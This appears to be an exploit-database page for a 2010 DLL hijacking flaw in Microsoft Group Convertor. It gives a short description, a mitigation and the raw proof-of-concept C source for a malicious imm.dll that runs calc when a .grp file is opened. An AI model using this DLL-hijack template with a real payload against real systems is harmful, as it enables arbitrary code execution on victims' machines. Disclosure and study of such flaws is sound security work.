header-logo
Suggest Exploit
vendor:
Group Convertor
by:
Beenu Arora
7,2
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: Group Convertor
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Microsoft Group Convertor DLL Hijacking (imm.dll)

A vulnerability in Microsoft Group Convertor allows attackers to execute arbitrary code by placing a malicious DLL in the same directory as a vulnerable file with the .grp extension. Compiling and renaming a malicious DLL to imm.dll and placing it in the same directory as a vulnerable file with the .grp extension will cause the malicious code to be executed when the vulnerable file is opened.

Mitigation:

Ensure that vulnerable files are not stored in directories with weak permissions, and that users are not allowed to write to these directories.
Source

Exploit-DB raw data:

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora

Exploit Title: Microsoft Group Convertor DLL Hijacking (imm.dll)
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3
Vulnerable extensions: grp

Compile and rename to imm.dll, create a file in the same dir with one of the
following extensions:
.grp
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14758.zip

Navigation

Suggest Exploit

Services By CQR